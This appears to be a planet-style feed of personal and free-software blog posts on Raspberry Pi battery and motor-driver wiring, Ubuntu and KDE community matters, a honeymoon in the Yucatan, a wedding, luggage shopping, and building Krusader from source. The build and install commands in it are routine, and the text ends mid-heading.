In my post about Controlling a toy car with a Raspberry Pi, I skipped over one important detail: the battery. How do you power the RPi while it's driving around the room?

Most RPi sites warn that you shouldn't use the Pi with a power supply drawing less than an amp. I suspect that's overstated, and it probably doesn't draw more than half of that most of the time; but add the draw of two motors and we're talking a fairly beefy battery, not a couple of AAs or a 9V.

Luckily, as an R/C plane pilot, I have a fridge full of small 2- and 3-cell lithium-polymer batteries (and a li-po charger to go with them). The problem is: the Pi is rather picky about its input voltage. It wants 5V and nothing else. A 2-cell li-po is 7.4V. So I needed some sort of voltage regulator.

It's easy enough to get a simple 5V voltage regulator (pictured at right) -- 30c at Jameco, not much more locally. But they're apparently fairly inefficient, and need a heat sink for high current loads. So I decided to blow the big bucks ($15) for a 5V step-down power converter (left) that claims to be 94% efficient with no need for a heat sink.

Unlike most of Adafruit's products, this one comes with no tutorials and no hints as to pinouts, but after a little searching, I determined that the pins worked the same way as the cheap voltage regulators. With the red logo facing you, the left pin (your left) is input power from the battery; middle is ground (connect this to the battery's ground which is shared with the Pi's ground); the right pin is the regulated 5V output, which goes to pin 2 on the Pi's GPIO connector.

I was able to run both the RPi and the motor drive circuit off the same 7.4 volt 2-cell li-po battery (which almost certainly wouldn't work with 4 AAs, though it might work with 8). A 500 mAh battery seems to be plenty to drive the RPi and the car, though I don't know how long the battery life will be. I'll probably be using 610 mAh batteries for most of my testing, since I have a collection of them for the aerial combat planes.

Here's a wiring diagram made with Fritzing showing how to hook up the battery to power a RPi. If you're driving motors, you can run a line from the battery's + terminal (the left pin of the voltage regulator) as your motor voltage source, and use the right pin as your 5V logic source for whatever motor controller chip you're using.

Healthy relationships. I've been thinking about them not in my personal life, but in terms of teams in free software. When I first began contributing, it was within a team creating an application (Amarok), so rather small. Then I became active in Ubuntu-Women, which is larger, but still not huge. Then Kubuntu, then the larger Ubuntu community, and now KDE, which is truly enormous.

In all of these projects, communication and trust are paramount. Dialog which fosters creativity and progress is only possible when people enlarge their trust in one another. Along the way to the highest trust levels, many barriers will come down, as people allow them. Sometimes these barriers are invisible, until someone points them out.

I thought I'd seen a cartoon illustrating this story, but a web search tells me it's a story by David Foster Wallace:

Two young fish meet an older fish, who asks them “How’s the water?” The younger fish look at each other and say, “What the hell is water?”

I was reminded of this story recently while observing the various reactions to the removal of the Community link on Ubuntu.com, the portal to the Ubuntu project. The link is coming back, so I'm not complaining. However, what I've noticed is that most of the people discussing the issue seem to be talking past the folks they are hoping to connect with. The emotions expressed range from puzzlement, to shock and outrage, with little understanding on the other "side" on the perceptions causing these reactions.

So how is the water? To me, the drama played out completely predictably, because any time you have one company selling a product, and volunteers working in that same project, you will have class issues, and class is like the water fish swim in. People are often not aware of it, and thus have difficulty dealing with their emotions around it, because they have been taught to ignore it, or even that it doesn't exist. So when the designers removed the link, it was felt as a slap to the face of community members, while the designers see it as just a step to a clean, functional design. The conversation about this change at the recent vUDS clearly betrays this lack of understanding of the other on all sides. http://summit.ubuntu.com/uds-1305/meeting/21740/community-1305-ubuntu-website-planning/

There is no such thing as a culture without class. There are always power imbalances, and privileges. However, that doesn't mean that class is the death of the Ubuntu project, or that volunteers and companies can't happily co-exist. They can, but the fact of class must be acknowledged, and those with privilege and power must realize what they have, and use them on behalf of the project.

A healthy culture has hierarchy, but not one based on domination. In fact, in FOSS that is part of what we are attempting to dislodge, right? We want our hierarchies to be constructed for function, not to rule over us. For instance, those who demonstrate their skill in packaging or coding are given the right to upload to the repositories. And those who grant them that right are those who already have built their reputations by using their skill and trustworthiness in that domain.

Recently there has been a breakdown -- or an apparent breakdown -- in that hierarchy of function in Ubuntu. And I think that both those inside Canonical and those outside, perceive that the other is the one causing that break. So, some repair is needed.

All of our differences can be overcome as we build (or re-build) trust. However, all sides of the issue will need to think about, process emotion about, and finally discuss openly what has gone on. The replacement of the Community link alone will not mend this breach, nor will brief virtual UDS sessions. In fact, I think the lack of in-person face-to-face interaction is allowing this divide to grow.

Folks, we don't want resentment and suspicion to grow, so we are all going to need to work on this if the Ubuntu project is going to continue to thrive as a free software enterprise. In my opinion, thinking about and discussing class issues are fundamental to that effort.

This blog appears on the Linuxchix, KDE and Ubuntu planets, and these issues of class appear in all teams. Health and progress are the goal, and honest dialog is the means. I propose we look one another in the eye and start a conversation. These are difficult dialogs, but our health is at stake.

For each Ubuntu release I spend a little time finding a toy or other representation of the codename animal to use at booths, Ubuntu Hours and other events. I wrote about Quetzals and Pangolins here and you may have seen Raring here.

When the salamander came up I was confident that a toy would be easy to find, and indeed they were! Even better, I found that the World Wildlife Fund offers a $50 Hellbender Salamander Adoption Kit that ships with 2 plush salamanders! Mine arrived yesterday, I’ll be keeping one to use at our events and will find a way to give away the other (perhaps as part of the Ubuntu Women contest we’re planning? Or at some LoCo event?).

Event decoration + helping to save the actual animal, hooray!

Oh, and it is a release late, but while I was in Mérida, Mexico we stopped in to Miniaturas where I picked up some adorable quetzal earrings:

I think I’ll wear them to our San Francisco Ubuntu Hour on June 12th, and bring along the salamander!

Since I left for my wedding and honeymoon a bunch of things happened! Ubuntu 13.04 was released, 13.10 was given the code name “Saucy Salamander” and Debian 7.0 Wheezy came out. Plus lots of exciting OpenStack development discussion that came out following the Summit (I left right after it). When I got back into the country on the 12th I had a lot to catch up on! I did my best to cram before sessions and certainly had to limit involvement to a handful of sessions that I was particularly keen on attending and so could get up to speed with quickly.

This was the first virtual UDS I was able to participate in, so it was all new to me. Essentially the the “fish bowl” (as seen here, I took this photo from my spot in the wider attendee seating) is replaced by a Google Hangout and the “wider attendee seating” is an IRC channel. For the 4 sessions I participated in this worked very well, session leads were pro-active about asking who wished to participate in the Hangout so everyone who wanted to was able to. A great deal of attention in all these sessions was given to the IRC channel, which is a contrast with in person UDS where the channel can sometimes get a bit left behind (even though it’s being projected, it was easy to forget once you get talking). I didn’t use the summit.ubuntu.com page for anything aside reference, preferring to pop out the etherpad and use my standard IRC client, but I appreciated it all being there as a resource (and I’m sure it was super helpful for newcomers to follow along!).

I found the sessions I participated in to be productive and focused and when applicable resulted in a solid list of action items. I hope that the event also lessened the experience gap that was always present for in person vs. remote participants, we all got the same experience. Now I have to admit to not being a fan of using Google Hangouts for this (I like Google, but it is still a proprietary, closed-source tool that we have no control over), but I understand that the ease of use and immediate availability of videos on YouTube makes a compelling case. Perhaps my only other complaint is lack of cohesiveness that comes from an online event, I didn’t watch the introduction or the wrap up. I also didn’t participate in the “beer hangout” – I didn’t even know it was happening, and sitting in front of my computer with a beer in the middle of the day wasn’t particularly interesting to me. I only attended a few specific sessions and there was no “wandering into something that looks interesting” (instead I just went back to work) or the regular social down time we get to relax or sit down to hack on things. I do hope we can find some kind of replacement for the in-person events, it would be great to see something on the LoCo team level at conferences where we seek to have an expanded Ubuntu presence focused on contributors (perhaps an Ubucon with a participant track?).

And the venue… it was at home! In order to participate in the hangout I did feel the need to leverage my multiple monitors.

Now the sessions themselves…

– Planning for Ubuntu Community presence on the Ubuntu Website –

This was not a particularly productive session as far as action items were concerned, but it turns out that while I was gone the removal of the “Community” link from ubuntu.com took on a life of its own (and boy was I surprised to see my name end up in a recent Datamation article about it). Personally I was satisfied with Daniel Holbach’s blog post on the subject a day after the change was made, but it was nice to speak with with some folks from the Design team and allow everyone to confirm that no ill will was intended and that plans for a new and improved community site were moving forward. The session was kept short given the more structured session about the community site specifically planned for the following day.

YouTube video of the session here

– Ubuntu Women UDS-1305 Goals –

Huge thanks to Silvia Bindelli and Cheri Francis for doing all of the leg work for this session while I was gone, I felt very comfortable reviewing their pre-session notes and found a really great, collaborative environment upon joining in. The discussion began talking about an information scavenger-hung competition that the team will be doing in the coming months, seeking volunteers to assist. It then moved into a topic that I was really happy to see on the agenda – a user poll to see how the team could be most effective in serving our audience of women interested in Ubuntu. I find that the project needs a bit of an adjustment every couple of years to refocus on our current targets as Ubuntu and the open source ecosystem evolves, so I’m excited that we’re doing this. Finally, much of the session was spent discussing our intention to further collaborate with other groups seeking to encourage women in open source (and in technology in general).

YouTube video of the session here and I uploaded session notes here

– Revamping ubuntu.com/community –

Picking up from where discussion left off the previous day, this session was a focused on on concrete things that need to be done to get the proposed community website that was under development reviewed and published. I admit that job change + wedding planning had my attention diverted this past cycle so I wasn’t able to contribute to this project, but I made sure to spend time the night before to do a review of the content so I’d be prepared. I was able to go through some of my suggestions during the meeting and took a few action items to continue with a more thorough review and to collect some quotes and photos from the community to make the site more personal and approachable.

YouTube video of the session here and I uploaded session notes here

– Shaping a plan for the future of Ubuntu Documentation Team –

I can’t begin to say how pleased I was to see this session land on the agenda. The Ubuntu Doc team has been a very small team for a long time, and new contributors have struggled to participate as the docs for writing the docs got stale to a point where they were not useful. We’re at a very exciting time now where we have limited support from a couple of the (very busy!) former drivers of this team and at least two strong contributors who have committed to moving the project forward. The first thing on the agenda was addressing the updating of docs so that more contributors can get on-boarded. I was able to pitch in with a couple action items to nudge things along a bit, but I’m hopeful that this is the beginning of an exciting new phase for the team.

YouTube video of the session here and I uploaded session notes here

– Xubuntu –

Since the event was online, the Xubuntu team took advantage of the flexibility and ended up pulling their sessions from UDS proper and scheduling our sessions for the hour after UDS each day to tackle a series of blueprints designed for the coming months. I was able to use my YouTube account + Hangouts to replicate that portion of what main UDS was doing.

Discussion of most interest to me centered around our testing+release plans (should we do alphas? betas? which ones?) and documentation, but discussion of our limited developer force (want to grow it!), a proposal for a shortcut overlay and default applications also were discussed. A much better summary was posted on the Xubuntu website yesterday: Looking towards Xubuntu 13.10. Pasi Lallinaho also wrote bullet-point style summaries of Night 1 and Night 2 which include links to their respective YouTube videos.

In all, a productive UDS for me, I have a lot of work to do… :)

The second half of our honeymoon was full of adventure (and ok, a bit more luxury). We decided to spend 5 days traveling through the Yucatan peninsula visiting Mayan ruins, cenotes and local cities. We wanted our visit to be stress-free so MJ did some research and found William Lawsons Personal Driving Service which would not only take us around the peninsula but our driver would also be a registered tour guide! We met our guide, Angel, at the resort on Tuesday morning to begin our adventure.

Our first visit was to the ruins of Ek’ Balam. This was a really cool site, with multiple structures to climb, including the huge main temple. It wasn’t until I climbed to the top that I fully appreciated how hot it was out (and that I hadn’t brought enough water!).

More photos from Ek’ Balam

I was pretty tired after wandering around those ruins in the heat, so I was delighted when our tour guide was able to find Cenote Hubiku, just north of Valladolid where we were spending the night. A cenote is a “a deep natural pit, or sinkhole, characteristic of Mexico, resulting from the collapse of limestone bedrock that exposes groundwater underneat” (wikipedia). There are thousands in the Yucatan and many that are equipped for people to swim in. Cenote Hubiku had a small admission fee and full, modern facilities for changing before swimming. We caught them at the tail end of their day, but got a good 20 minutes of swimming in the beautiful, cool cenote before being on our way. It was the perfect thing for post ruin exploration.

Photos from Cenote Hubiku.

For dinner we went to Taberna de los Frailes for a delicious dinner that included a grilled watermelon with cheese appetizer (which I wouldn’t have ordered, but the waiter recommended it). We retired for the night at Casa Hamaca Guesthouse which was a cute little inn in the heart of Valladolid. Even better, the proprietor Denis Larsen is a northeast US expat who was exceptionally welcoming and helpful the next morning as we enjoyed banana pancakes and chatted about everything from our shared love of Google Docs for collaboration to tips for the rest of our stay in the Yucatan.

We then spent the day exploring the beautiful city of Valladolid. We visited the small San Roque Museum and then spent some time walking around the main square. From there we did some shopping and I picked up a couple of the traditional embroidered blouses that Valladolid is famous for. We also got a couple of brimmed hats for further ruin exploration. Mid-day we met up with Angel who took us to the Convent of San Bernardino de Siena and Cenote Zaci – a cenote right in town! We didn’t swim but it was nice to visit.

Photos from Valladolid

Come late afternoon it was time to start driving toward Mérida to check in to Hacienda Xcanatun boutique hotel for the night. This former hacienda was one of the many in the region that used to be a sisal (fiber) plantation. This was my favorite hotel. The rooms were sprawling and while modernized, still held an architectural feel and basic layout similarities to what I’d expect from and old hacienda. We had dinner at their famous on-site restaurant of the same name.

Photos from Hacienda Xcanatun

The next day was Uxmal! Plus a couple other sites on the Puuc Route. Uxmal was a major city and so touring the ruins takes several hours. We managed to see most of it and had a lot of fun climbing around several of their major structures (only the largest and a few minor sites had climbing prohibited). This site really rivals Chichen Itza in how big and amazing the ruins are, definitely one of my favorites.

More photos from Uxmal

Next on our list to visit for the day was Kabah. Most amazing about this place was its famous “Palace of the Masks” which was a whole building covered on one side with ornate faces of stone. You’re allowed to climb up to and around the palace, making this probably my favorite small site we visited.

More photos from Kabah

The last ruin site we visited was Sayil where we just visited the Palace of Sayil (the site was very spread out, with buildings up to 1 mile apart). Like so many of these palaces, it was an impressive and imposing sight! No climbing up the structure allowed though.

Photos from Sayil

Our final new site of the day was the Ecomuseo del Cacao. Our first hint that this place wasn’t quite up to par with the rest of our day was the clue from Angel that, while a traditional Mayan thing, cacao doesn’t actually grow naturally in the Yucatan because it’s not humid enough. The museum had it’s moments but was a bit too polished and cheesy. It was nice visiting the grove of artificially maintained cocoa trees and the hot chocolate tasting at the end was probably worth the entrance fee.

Photos from Ecomuseo del Cacao

From there we headed back to Uxmal for a sound and light show. I hadn’t read great things about it online, so I was prepped for something really cheesy, but I admit having really enjoyed it. The main track being broadcast is in Spanish, but you can rent headphones in several languages so you can hear the stories going along with the show that paint a picture of what it may have been like in the height of civilization there. It was also then that I noticed how beautifully clear the sky was out there, you could see so many stars.

That night we checked into Hacienda Temozon. It was a beautiful property, advertisements for it are quick to tell you that Bill Clinton stayed there once and the only owned by a major American company. The rooms were large, but it turns out perhaps not the right place to stay during ant season. Staying true to some of the age of the place, it didn’t have glass on the windows so everything was quite open-air and the doors covering the windows didn’t seal (you could put your finger through some of the gaps). I did enjoy a wonderful Mexican omelette in the morning.

Photos from Hacienda Temozon

Angel picked us up in the late morning and, knowing our interest in cenotes, decided to take us to a less touristy one that he knew of, Cenote Kankirixché. It wasn’t a fancy, staffed cenote like the previous ones we’d been to, we had to change in the van and then it was just a hole in the ground and a somewhat questionable wooden staircase taking you down to the water. It was beautiful and refreshing though!

More photos from Cenote Kankirixché

From there we were off to the city of Mérida! First stop was to check in to the stunningly modern Rosas and Xocolate boutique hotel before heading across the street to the Anthropology and History Museum. The museum is located in the former Canton Palace and while all in Spanish the exhibits mostly spoke for themselves. My favorite exhibits were one of one of the earlier expeditions to the Yucatan where many of the Puuc sites we explored, seeing photos from those sites before they were uncovered and restored was really cool. They also had a local embroidery exhibit upstairs which, seeing them in context, made me really happy about my beautiful blouse purchases in Valladolid.

Then it was off to the Grande Plaza district of Merida where we had lunch at Amaro. We did some shopping and were able to visit the Casa de los Montejo and the Palacio de Gobierno with it’s captivating murals by Fernando Castro Pacheco. We enjoyed dinner back at the hotel and in all a relaxing night.

Photos from Mérida

Unfortuantely the adventures had to come to an end at some point, our last day was spent visiting the famous Chichen Itza.

Chichen Itza is a huge settlement and we spent over 3 hours exploring it. It was more crowded than any of the other sites we went to, but the benefit of going in the hottest part of the year is that it wasn’t overwhelming with people at all. One of the interesting things about it though was while it’s expensive for tourists to enter (up to 5 times as much as other sites), the whole inside was filled with vendors! Angel told us it was because it used to be privately owned and they owner brought in all these vendors, and when it was transferred to more government run thing they kept the vendors. At first it was a little off-putting to have so many vendors throughout the archaeological site, but I came to realize that these vendors were selling on-topic keepsakes that tourists (including myself) were interested in buying, and technically these people are descendants of the Mayans who built this city – this is theirs. It also brought a liveliness to the site that was lacking at the other sites, I appreciated them by the time we were wrapping up our day there. And what a day. You couldn’t climb any of the ruins but it’s probably for the best, even just walking among these giants in the heat was enough to tire me out considerably.

More photos from Chichen Itza

We spent our last night in Mexico in Cancun so we’d have easy access to the airport the following morning. MJ picked a hotel on the beach where we could have a romantic private cabana dinner. Perfect wrap up to our honeymoon :)

As I hear friends and acquaintances express eagerness to see the Ender's Game film that will be released this fall, I have a hard time responding. I want to ask, have you read the book? After you were fifteen years old? And you enjoyed it? I can't understand how it won the awards it did. It's not just poorly written, it's repugnant. John Kessel articulates why in his essay Creating the Innocent Killer:
Ender's Game, Intention, and Morality. An excerpt:

We see the effects of displaced, righteous rage everywhere around us, written in violence and justified as moral action, even compassion. Ender gets to strike out at his enemies and still remain morally clean. Nothing is his fault. Stilson already lies defeated on the ground, yet Ender can kick him in the face until he dies, and still remain the good guy. Ender can drive bone fragments into Bonzo’s brain and then kick his dying body in the crotch, yet the entire focus is on Ender’s suffering. For an adolescent ridden with rage and self-pity, who feels himself abused (and what adolescent doesn’t?), what’s not to like about this scenario? So we all want to be Ender. As Elaine Radford has said, “We would all like to believe that our suffering has made us special—especially if it gives us a righteous reason to destroy our enemies.”

But that’s a lie. No one is that special; no one is that innocent. If I felt that Card’s fiction truly understood this, then I would not have written this essay.

This entry was originally posted at http://bokunenjin.dreamwidth.org/38505.html.

What does every development team want? New contributors!

I'd like to suggest a simple process that can turn visitors to your website, list or IRC channel into a successful part of the development team. When people actually contribute, they quickly feel like a valuable part of the group. New people bring fresh energy, and new ideas.

At your next sprint or meeting, start dreaming. Is your user documentation well-written and up-to-date? Do you need promotion, or video guides? How about art or diagrams for your website? Speaking of your website, when was the last time all the links were tested, and it was checked for spelling and grammar? Create a nice, friendly list of tasks for your newcomers.

Could your codebase use some grooming, for common misspellings, for instance? (EBN is a great source for these). When you run across a bit of code which needs pruning or refactoring, or normalizing signal-slot stuff, the easy thing is to fix it while it's in front of your eyes. Instead, consider which of these small tasks can be filed as a "Junior Job", created for the purpose of getting those knowledgeable people to move from faithful user, to part of the team.

The Bugsquad and Quality Control teams can likely suggest more ideas, too.

KDE Junior Jobs can be easily found: http://kde.org/jj. Teams can create their own shortcut links too, such as Amarok has done, listed in the #amarok IRC channel topic: http://tinyurl.com/amarokjjs. Other tasks can be blogged about, posted on a trello, on the Community wiki; whatever your team likes to use. For more ideas, see http://community.kde.org/Getinvolved.

The Kubuntu team has a list of tasks in Trello, which works well.

So, when you feel like not fixing a little issue, don't feel lazy. Feel responsible! File a bug, make it a JJ, and call attention to those issues when new folks show up and ask, how can I help?


PS: Thanks to the #kde-www team for suggesting this blog. Einar77, neverdingo, mamarok; you are wonderful.

PPS: How LibreOffice does it: https://wiki.documentfoundation.org/Development/Easy_Hacks

On Tuesday the 30th we flew from Philadelphia to Cancun, Mexico. From there we took a shuttle south for about 40 minutes until we got to the Riviera Maya district and Grand Velas, the all-inclusive resort we had reservations at for the first week of our honeymoon.

We then spent a much-needed week relaxing.

We had a stunning view from our room.

Hours to spend relaxing on the beach, or in one of their several pools where they brought us all the food and beverages we wanted.

Plus, chocolate strawberries.

I read my way through several books that I’d been wanting to read but never could find time for. Pretty much the only decision we needed to make all week was which of the top notch restaurants they had on site for each meal. I quite enjoyed room service for breakfast.

More photos from our stay: http://www.flickr.com/photos/pleia2/sets/72157633490351996/

We did end up making one excursion during the week, and that was to Rio Secreto, a nearby series of underground caves and waterways. I wasn’t sure what to expect since it was quite close to such a touristy area (tourist trap?) but my expectations were surpassed in all ways. We were geared up with water shoes (we opted to buy new ones for $10/pair), helmets and wet suits and we had a great tour guide, but it was far from a risk-free, polished tourist experience. We got a real feel for the natural caves and we had an amazing time swimming through some of the pools we were taken through in our 3 hour tour through 600+ meters of cave.

A photographer came along with to take photos and we paid the charge to download them all royalty-free, I uploaded several of them here: http://www.flickr.com/photos/pleia2/sets/72157633479166189/

Alas, the luxurious stay had to come to and end at some point. The following Tuesday we packed up… but not to end our honeymoon! Instead we repacked to spend the next 5 days traveling through the Yucatán visiting Mayan ruins and modern Yucatán cities! But that’s for the next post…

On Sunday April 28th MJ and I were married!

The day began gathering with mothers, my aunt and the bridesmaids in the bridal suite of the Joseph Ambler Inn where we and most of our out of town guests stayed. Inn Manager Keenan Christiansen and Brian Cottman really made us feel welcome throughout our stay and during all the planning.

My maid of honor, Danita Fries, took care of morning makeup and hair preparations, bringing in Daneene Jensen and her team to take care of hair and makeup for all of us. Not being a makeup person, I wasn’t thrilled about the idea of wearing it, but Daneene made me feel comfortable and was great about keeping the makeup light and the look very natural. MJ’s Best Woman even stopped by with refreshments in the late morning so we wouldn’t be without lunch.

We met with our photographer, Melissa Morelli, at 1PM to begin taking photos at the inn. She was the photographer MJ hired for our engagement and a few months back she also did my head shots. We were really happy to have her join us in Pennsylvania for the wedding.

After photos at the inn, we took a small bus chartered by 1st Class Transportation over to the wedding venue, Talamore Country Club.

The weather was beautiful, which was quite fortunate as the wedding was outdoors and Melissa was able to take some great pictures throughout the venue before the ceremony.

Everything began the signing of the Ketubah we selected by Amy Fagan of 20th Century Illuminations and the Badeken.

Then, the ceremony! We went back and forth about having a videographer for our wedding and decided to go with one from the Mixed Media Productions, the firm our DJ, Mike Robertson, runs. In retrospect I’m glad we decided to have one, the photos are great but I was so overwhelmed (happy! excited! nervous!) that I can’t say I actually remember that much of the ceremony :)

It all went very smoothly. My mother and grandfather walked me down the aisle. We were honored to have Rabbi Elliot Holin work with us on the ceremony and finally to officiate.

We also held our reception at Talamore, starting with a cocktail hour in the garden room (this room was also backup for ceremony had it rained). Then dinner in their main ballroom which was decked out with the amazing flower centerpieces by Moles Flowers.

The rest of the reception was also pretty traditional, short speeches from family and friends, a first dance and cake! We selected a multi-flavor cake from Bredenbecks and I made sure to have a bit of each ;)

And in addition to being able to talk to many of our guests, we even danced a bit! It was an amazing night.

Afterwards we had a bit of an after party back at the Inn, giving us time to kick back and relax for a couple hours with some of our guests.

In all, things went as perfect as I could have imagined thanks to MJ’s attention to detail throughout the process along with some great vendors who were able to work with us on requests.

We’ll be updating our website in the coming weeks with tons more photos and other details of our wedding weekend which included family and wedding party dinners.

Checking versions in Debian-based systems is a bit of a pain.

This happens to me a couple of times a month: for some reason I need to know what version of something I'm currently running -- often a library, like libgtk. aptitude show will tell you all about a package -- but only if you know its exact name. You can't do aptitude show libgtk or even aptitude show '*libgtk*' -- you have to know that the package name is libgtk2.0-0. Why is it libgtk2.0-0? I have no idea, and it makes no sense to me.

So I always have to do something like aptitude search libgtk | egrep '^i' to find out what packages I have installed that matches the name libgtk, find the package I want, then copy and paste that name after typing aptitude show.

But it turns out it's super easy in Python to query Debian packages using the Python apt package. In fact, this is all the code you need: import sys import apt cache = apt.cache.Cache() pat = sys.argv[1] for pkgname in cache.keys(): if pat in pkgname: pkg = cache[pkgname] instver = pkg.installed if instver: print pkg.name, instver.version Then run aptver libgtk and you're all set.

In practice, I wanted nicer formatting, with columns that lined up, so the actual script is a little longer. I also added a -u flag to show uninstalled packages as well as installed ones. Amusingly, the code to format the columns took about twice as many lines as the code that does the actual work. There doesn't seem to be a standard way of formatting columns in Python, though there are lots of different implementations on the web. Now there's one more -- in my aptver on github.

Luggage with a built-in scooter is awesome. I've seen ride-on wheeled luggage for kids (and coveted it mightily), and this appears to be the adult-friendly equivalent. Sadly, does not meet a lot of my other criteria (I'd be shocked if they let me avoid gatechecking this) and it's $250 (But at least shipping is free...). I'm tempted just for the awesome factor.


Here's a small hard case that meets a lot more of my criteria. It clocks in at 35cmx39cmx23cm (that's 14"x15"x9" for those of us who have to fly in America) and comes in cheerful colours. I'm actually not sure which one I'd choose -- normally I shun the pinks but that dark one is pretty lovely and would fit nicely into some sort of business-travelling fashionista persona if I dressed the part with some business casuals. But maybe the green or red would be less likely to clash with my existing wardrobe.... Honestly, I'm approaching this project much like I do cosplay, and now that I think about it it's not really that different: I'm playing for an audience to believe me to be someone very specific. Nevermind that I'm still projecting a variant on me; it's all the same body language, fashion, and carefully chosen accessories that make it work.

Similarly, a bright orange gem that could probably work with the persona too. 36x44x20cm (14x17x8") for that one, and only two wheels tucked into the edges so probably a bit more packing space in the final tally.

But despite the obvious appeal for my in-progress traveler persona, I'm not seeing any useful way for me to get reviews of these that I can actually understand since they're shipping from Hong Kong, and I haven't quite decided if I really should be making a hundred dollar gamble just because the colours are fun. I wonder if it's possible to find something similar that's at least a little more local to me? I have learned the useful new search terms "rolling business case" but it's mostly been turning up uninspired blackness.


Incidentally, I *did* check the wirecutter and they do have a section on bags, just not the kind I'm looking for. Bags are one of those few things I'm exceptionally picky about (especially right now while mildly injured, but even when not I tend to have precise requirements) so it probably isn't that much of a loss. They're apparently looking for a freelance bag editor and I rather wish I were actually the right person for that job. Lot of work for little pay, but a chance to try lots of bags!

comments

Beginners, you are not alone! Many of us have tried to work through problems, only to be stymied when the steps to work through the problem don't work, and efforts to google those error messages yields nothing helpful. In fact, that's why I started this blog; not just to remind myself how to fix various problems, but to point the way to others who are trying to learn the way to CLI-foo.

A word to the wise who are trying to help beginners -- please don't leave out "obvious" steps!

I'll illustrate with a recent experience I had, trying to help a user work through a problem using Krusader.  A bit of googling told me that s/he wasn't alone; there are bugs filed on both launchpad[1] and bugs.kde.org[2]. First, kudos to the unnamed person for asking for help in IRC. That's an excellent place to get step-by-step help.

In the launchpad bug, a helpful person posted a series of step to fix the bug by building an updated version from source:

Made my own deb from 2.4.0.beta3 which solved the `krarc` problem.
How to:
0 Uninstall Krusader
1 download source from http://www.krusader.org/
2 cd krusader-2.4.0-beta3
3 cmake -DCMAKE_INSTALL_PREFIX=/usr/ -DQT_INCLUDES=/usr/share/qt4/include
4 make
5 sudo checkinstall
Don´t forget in step 5 to set version on 3 instead of beta3, only digits are allowed in versions in debs nowadays.

The unfortunate user came back into IRC, and posted this error message:

xy@xy-ubuntu:~/Downloads$ cmake -DCMAKE_INSTALL_PREFIX=/home/user/app/krusader-2.4.0-b3-2 -DQT_INCLUDES=/usr/share/qt4/include
CMake Error: The source directory "/home/jony/Downloads" does not appear to contain CMakeLists.txt.

Having struggled through this process myself, I see what's missing in the instructions. The person posting them didn't realize, I'm sure, that steps were being left out, because they have become automatic. To a beginner, they are bewildering.

Step zero, uninstall, is unambiguous. So far, so good.
Step one, download source, leaves out the best practice, which is to create a directory into which you want your source file! Probably not specified as people have their own schemes of organization, but in general, I advise a ~/kde folder into which I put all source files and builds (thank you for your advice on that, Myriam!)

So step one should be: a) open a konsole, and type or paste: mkdir kde && cd kde && mkdir krusader && cd krusader && wget http://downloads.sourceforge.net/krusader/krusader-2.4.0-beta3.tar.bz2
Then, step b) tar xf krusader-2.4.0-beta3.tar.bz2

Then, do step two, which is correctly stated as cd krusader-2.4.0-beta3

Step three is almost all there, with a missing note: be sure you have cmake installed! My bet is that my troubled user did not.

Cmake ran uneventfully, as did make, so steps three and four are perfect. Step five, however, does not work at all for me, because I don't have checkinstall installed. And I don't think I'll do that for the sake of finishing this blogpost! I don't need a deb file, when Krusader is available from source.

I hope our Kubuntu packagers will get the newest version packaged soon, and make it easy for my troubled user.

1. https://bugs.launchpad.net/ubuntu/+source/krusader/+bug/1065110
2. https://bugs.kde.org/show_bug.cgi?id=294542

In my previous article about pulse-width modulation on Raspberry Pi, I mentioned that the reason I wanted PWM on several pins at once was to drive several motors, for a robotic car.

But there's more to driving motors than just PWM. The GPIO output pins of a Pi don't have either enough current or enough voltage to drive a motor. So you need to use a separate power supply to drive the motors, and do some sort of switching -- at minimum, a transistor or relay for each motor.

There are lots of motor driver chips. For Arduinos, "motor shields", and such things are starting to become available for the Pi as well. But motor shields are expensive, usually more than the Pi costs itself. If you're trying to outfit a robotics class, or to help low-income students build robots, it's not a great solution.

When I struggled with this problem for the Arduino, the solution I eventually hit on was a SN754410 H-bridge chip. For under $2, you get bidirectional control of two DC motors. For each motor, you send input to the chip via a PWM line and two directional control lines.

The only problem is the snarl of wiring. One PWM and two direction lines per motor is six wires, plus power for the chip's logic side, power for the motors, and ground, and the three pins for a serial cable, and you're talking a lot of wires to plug in. Although this is all easy in comcept, it's also easy to get a wire plugged in one spot over on the breadboard from where it ought to be, and then nothing works.

I spent too much time making tables of what should get plugged into where. I ended up with a table like this:

Pi connector pin	GPIO (BCM)	SN754410 pin
Pi 2	5V power	Breadboard bottom V+ row
Pi 18	24	1 (motor 1 PWM)
Pi 15	22	1 (motor 0 PWM)
Pi 24	8 (SPI CE0)	4 (motor 1 direc 0)
Pi 26	7 (SPI CE1)	14 (motor 1 direc 1)
Pi 25	Gnd	Breadboard both grounds
Pi 19	10 (MOS1)	3 (motor 0 direc 0)
Pi 21	9 (MOS0)	13 (motor 0 direc 1)
motor 0		5, 11
motor 1		6, 12

... though, as you'll see, some of those pin assignments ended up getting changed later.

One more thing: I found that I had to connect the chip's logic V+ (pin 2 on the SN754410) to the 5v pin on the RPi, not the 3.3V pin. The SN754410 is okay with 3.3V logic signals, but it seems to need a full 5V of power. Programming it

The software control is a little trickier than it ought to be, too, because of the 2-wire control lines on each motor. With both lines high or both lines low, nothing moves. (Some motor driver chips distinguish between those two states: e.g. both low might be a brake, while both high lets the motor freewheel; but I haven't seen anything indicating the SN754410 makes any distinction.) Then set one line high, the other low, and the motor spins one way; reverse the lines, and the motor spins the other way. Assuming, of course, the PWM line is sending a signal.

Of course, you need RPI.GPIO version 0.5.2a or later to do any of this PWM control. Get it via pip install --upgrade RPi.GPIO -- the RPI.GPIO in Raspbian mis-reports its version and is really 0.5.1a.

Simple enough in concept. Okay, now try explaining that to beginning programmers. No, thanks! So I wrote a PiMotor class in Python that takes care of all those details. Initialize it with the pins you want to use, then use calls like set_speed(s) and stop(). It's on GitHub at pimotors.py.

I put the H-bridge chip on a breadboard, wired up all the lines to the Pi and a lithium-polymer airplane battery, and (after several hours of head-banging while I found all the errors in my wiring), sure enough, I could get the motors to spin.

But one thing I found while wiring was that I couldn't always use the GPIO lines I'd intended to use. The RPi has seemingly a lot of GPIO lines -- but nearly all of the GPIO lines have other purposes, except I haven't found any good explanation of what those uses are and how to know when they're in use. I found that quite frequently, I'd try a GPIO.setup(pin, GPIO.OUT) and get "This channel is already in use". Sometimes GPIO.cleanup() helped, and sometimes it didn't. None of this stuff has much documentation, and I haven't found any IRC channel or mailing list for discussing RPi GPIO. And of course, there's no relation between the pin number on the header and the GPIO pin number. So I spent a lot of time counting breadboard rows and correlating to a printout I'd made of the RPi's GPIO socket. Putting the circuit on a proto-board

